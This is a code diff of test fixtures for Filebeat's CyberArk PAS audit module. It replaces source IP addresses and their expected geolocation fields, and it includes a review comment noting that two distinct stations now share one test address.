@@ -255,11 +245,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:58Z",
 "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
 "cyberarkpas.audit.message": "Add File Category",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.14\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMPLiveSessions",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 11 08:59:58",
 "event.action": "add file category",
 "event.code": "105",
@@ -272,26 +262,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3275,
+ "log.offset": 3271,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log
index 14adbc29da4b..2ffa4e3deea6 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log
@@ -1,6 +1,6 @@
 <5>1 2021-03-08T18:25:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:25:52","IsoTimestamp":"2021-03-08T18:25:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"Administrator","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[components] Old Value=[Address]","ExtraDetails":"","Message":"Update File Category","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
-<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File 
Category","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 81.32.170.205\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"81.32.170.205","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
-<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 34.66.114.180\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"34.66.114.180","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File 
Category","GatewayStation":""}}}
-<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File 
Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.12","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 67.43.156.14\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"67.43.156.14","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 81.2.69.143\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File 
Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"81.2.69.143","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
+<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 81.2.69.143\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"81.2.69.143","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json
index 2ac071e7963b..a996c2b683b7 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/106_update_file_category.log-expected.json
@@ -59,7 +59,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMLiveSessions",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:46:48",
 "event.action": "update file category",
 "event.code": "106",
@@ -79,19 +79,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -109,7 +106,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMLiveSessions",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:20:12",
 "event.action": "update file category",
 "event.code": "106",
@@ -122,25 +119,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1347,
+ "log.offset": 1346,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -155,11 +150,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:26Z",
 "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
 "cyberarkpas.audit.message": "Update File Category",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 81.32.170.205\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 67.43.156.14\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMRecordings",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 11 09:38:26",
 "event.action": "update file category",
 "event.code": "106",
@@ -172,26 +167,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2007,
+ "log.offset": 2005,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -206,11 +198,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:10:33Z",
 "cyberarkpas.audit.issuer": "PSMApp_ASR-WIN",
 "cyberarkpas.audit.message": "Update File Category",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 34.66.114.180\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 81.2.69.143\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMLiveSessions",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "34.66.114.180",
+ "cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.timestamp": "Mar 11 12:10:33",
 "event.action": "update file category",
 "event.code": "106",
@@ -223,25 +215,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 3611, + "log.offset": 3607, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.66.114.180" + "81.2.69.143" ], "service.type": "cyberarkpas", - "source.address": "34.66.114.180", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "34.66.114.180", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -256,11 +249,11 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:38Z", "cyberarkpas.audit.issuer": "PSMPApp_SSH", "cyberarkpas.audit.message": "Update File Category", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 81.2.69.143\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMPLiveSessions", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 06:49:38", "event.action": "update file category", "event.code": "106", 
@@ -273,23 +266,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 5211, + "log.offset": 5203, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.71.250.247" + "81.2.69.143" ], "service.type": "cyberarkpas", - "source.address": "34.71.250.247", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "34.71.250.247", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cyberarkpas.audit", "forwarded" diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log index d9c83a42d987..5455577e1ef6 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log 
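Review bot: Two previously distinct stations now resolve to the same test address: this hunk maps 34.71.250.247 to 81.2.69.143 for the PSMP SSH session, while the hunk at `@@ -223,25 +215,26 @@` above maps 34.66.114.180 to the same 81.2.69.143 for the PSM Windows session, so `source.ip` and `related.ip` no longer distinguish the two records. A fixture in which different stations share one address cannot catch a regression that attributes one session's station to another, and the two geo expectation blocks become identical copies. I would give the second station its own address from the reserved test ranges this PR already uses (67.43.156.12 and 67.43.156.14 appear elsewhere in the diff) and regenerate the expected JSON. Whether any test asserts on distinctness across records is not visible from here.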
@@ -1 +1 @@
-<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-34.71.250.247-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-34.71.250.247-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-81.2.69.143-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-81.2.69.143-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json index 371f33ab4f8f..d818ec7d8db6 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/125_rename_file_cont.log-expected.json @@ -3,12 +3,12 @@ "@timestamp": "2021-03-14T13:42:20.000Z", "cyberarkpas.audit.action": "Rename File (Cont.)", "cyberarkpas.audit.desc": "Rename File (Cont.)", - "cyberarkpas.audit.file": "Operating System-UnixSSH-34.71.250.247-PSMConnect", + "cyberarkpas.audit.file": "Operating System-UnixSSH-81.2.69.143-PSMConnect", "cyberarkpas.audit.gateway_station": "10.0.1.20", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:42:20Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Rename File (Cont.)", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-34.71.250.247-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-81.2.69.143-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", @@ -23,7 +23,7 @@ "event.module": "cyberarkpas", "event.severity": 2, "event.timezone": "-02:00", - "file.path": "Operating System-UnixSSH-34.71.250.247-PSMConnect", + "file.path": "Operating System-UnixSSH-81.2.69.143-PSMConnect", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", 
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log
index 3f6ae5f78715..62dfac9663cd 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log
